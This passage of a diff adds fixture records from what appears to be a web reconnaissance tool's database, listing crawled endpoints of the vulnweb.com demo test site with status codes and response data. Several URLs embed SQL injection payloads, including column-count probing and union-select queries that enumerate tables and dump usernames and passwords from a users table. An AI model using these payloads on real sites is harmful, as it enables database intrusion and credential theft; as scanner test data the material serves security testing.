"startScan.endpoint", + "pk": 2975, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php", + "content_length": 6, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:20.862Z", + "response_time": 0.355762493, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2985, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin/?C=M;O=A", + "content_length": 262, + "page_title": "Index of /admin/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:22.603Z", + "response_time": 0.33984009800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2986, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin/?C=D;O=A", + "content_length": 262, + "page_title": "Index of /admin/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:22.719Z", + "response_time": 0.35075960300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2987, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin/?C=N;O=D", + "content_length": 262, + "page_title": "Index of /admin/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:22.831Z", + "response_time": 0.33921382699999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 2989, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/admin/?C=S;O=A", + "content_length": 262, + "page_title": "Index of /admin/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:23.066Z", + "response_time": 0.34697324700000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3007, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/artists.php?artist%20=1", + "content_length": 5328, + "page_title": "artists", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:26.348Z", + "response_time": 0.343391725, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3014, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/bxss/vuln.php", + "content_length": 396, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:27.995Z", + "response_time": 0.35383842299999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3041, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "content_length": 276, + "page_title": "403 Forbidden", + "http_status": 403, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:36.259Z", + "response_time": 0.361898282, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3042, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "content_length": 273, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:36.369Z", + "response_time": 0.34718181499999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3043, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/comment.php", + "content_length": 1246, + "page_title": "comment on", + "http_status": 302, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:36.523Z", + "response_time": 0.34695127800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3044, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/crossdomain.xml", + "content_length": 224, + "page_title": null, + "http_status": 200, + "content_type": "text/xml", + "discovered_date": "2024-11-13T02:32:37.771Z", + "response_time": 0.355514343, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3073, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/index.php", + "content_length": 203, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:42.110Z", + "response_time": 0.350868254, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3077, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/hpp/index.php?pp=12", + "content_length": 383, + "page_title": "HTTP Parameter Pollution Example", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:43.084Z", + "response_time": 0.348435344, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3082, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/index.bak", + "content_length": 3265, + "page_title": "Home of WASP Art", + "http_status": 200, + "content_type": "application/octet-stream", + "discovered_date": "2024-11-13T02:32:44.256Z", + "response_time": 0.34283795300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3096, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+11--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:47.032Z", + "response_time": 0.35343173899999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3098, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%E2%80%9D", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:47.437Z", + "response_time": 0.34378632, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3099, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(uname,0x3a,pass)+from+acuart.users+--", + "content_length": 5150, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:47.626Z", + "response_time": 0.35347540400000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3100, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(table_name)+from+information_schema.tables+where+table_schema='acuart'+--", + "content_length": 5203, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:47.829Z", + "response_time": 0.353232343, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3102, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+1--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:48.151Z", + "response_time": 0.353159645, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3103, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+3--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:48.464Z", + "response_time": 0.353336908, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3104, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+11+--", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:48.639Z", + "response_time": 0.348325751, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3105, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+12--+", + "content_length": 4866, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:49.101Z", + "response_time": 0.353133843, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3106, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--", + "content_length": 5143, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:49.273Z", + "response_time": 0.358934581, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3107, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,database()+--", + "content_length": 5147, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:49.447Z", + "response_time": 0.364215876, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3108, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+2--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:49.623Z", + "response_time": 0.35962663500000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3110, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,+group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--", + "content_length": 5184, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:50.002Z", + "response_time": 0.34886039799999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3113, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/login", + "content_length": 555, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:50.708Z", + "response_time": 0.348473808, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3116, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+5--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:51.564Z", + "response_time": 0.357673504, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3117, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2+order+by+6--+", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:32:51.734Z", + "response_time": 0.351225181, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3182, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/logout.php", + "content_length": 4830, + "page_title": "logout", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:02.855Z", + "response_time": 0.34545837799999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3186, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/product.php", + "content_length": 5056, + "page_title": "picture details", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:04.311Z", + "response_time": 0.344491618, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3216, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/search.php?test=query'+0R+sqlspider", + "content_length": 4849, + "page_title": "search", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:09.616Z", + "response_time": 0.342849461, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3219, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/search.php?test=query", + "content_length": 4732, + "page_title": "search", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:10.232Z", + "response_time": 0.343490979, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3220, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/secured/database_connect.php", + "content_length": 224, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:10.406Z", + "response_time": 0.346886654, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3221, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/search.php", + "content_length": 4732, + "page_title": "search", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:10.579Z", + "response_time": 0.34337762600000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3222, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/secured/newuser.php", + "content_length": 415, + "page_title": "add new user", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:10.763Z", + "response_time": 0.361404942, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3229, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/secured/style.css", + "content_length": 5482, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:33:11.836Z", + "response_time": 0.347161294, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3230, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/sendcommand.php", + "content_length": 533, + "page_title": "add new user", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:11.963Z", + "response_time": 0.35880089800000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3232, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/secured/phpinfo.php", + "content_length": 45963, + "page_title": "phpinfo()", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:12.233Z", + "response_time": 0.356953071, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3233, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/secured/phpinfo.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000", + "content_length": 45963, + "page_title": "phpinfo()", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:12.390Z", + "response_time": 0.362605458, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3236, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=8", + "content_length": 221, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:12.902Z", + "response_time": 0.356710305, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3240, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg", + "content_length": 9692, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:13.441Z", + "response_time": 0.345094338, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3241, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg", + "content_length": 3324, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:13.578Z", + "response_time": 0.351771418, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3242, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg", + "content_length": 11465, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:13.721Z", + "response_time": 0.35313491399999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3243, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg", + "content_length": 13969, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:13.869Z", + "response_time": 0.340585894, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3244, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg", + "content_length": 12426, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:14.019Z", + "response_time": 0.355953836, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3245, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg", + "content_length": 14228, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:14.177Z", + "response_time": 0.363511795, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3246, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg", + "content_length": 19219, + "page_title": null, + "http_status": 200, + "content_type": "image/jpeg", + "discovered_date": "2024-11-13T02:33:14.317Z", + "response_time": 0.537454515, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3258, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/userinfo.php", + "content_length": 14, + "page_title": null, + "http_status": 302, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:15.890Z", + "response_time": 0.352865235, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3263, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/style.css", + "content_length": 5482, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:33:16.618Z", + "response_time": 0.35279359, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3264, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/signup.php", + "content_length": 6033, + "page_title": "signup", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:16.739Z", + "response_time": 0.35195482, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3266, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "content_length": 294, + "page_title": "Index of /wvstests/pmwiki_2_1_19/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:17.012Z", + "response_time": 0.35541375599999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3267, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/wvstests", + "content_length": 272, + "page_title": "Index of /wvstests/", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:17.153Z", + "response_time": 0.35632993599999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3271, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/version.php", + "content_length": 32, + "page_title": null, + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:33:17.628Z", + "response_time": 0.355025396, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3290, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/acunetix-logo.png", + "content_length": 4474, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:20.362Z", + "response_time": 0.356831849, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 3293, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 1, + "source": null, + "http_url": "http://vulnweb.com/table-images/back.png", + "content_length": 488, + "page_title": null, + "http_status": 200, + "content_type": "image/png", + "discovered_date": "2024-11-13T02:33:20.864Z", + "response_time": 0.343974728, + "webserver": 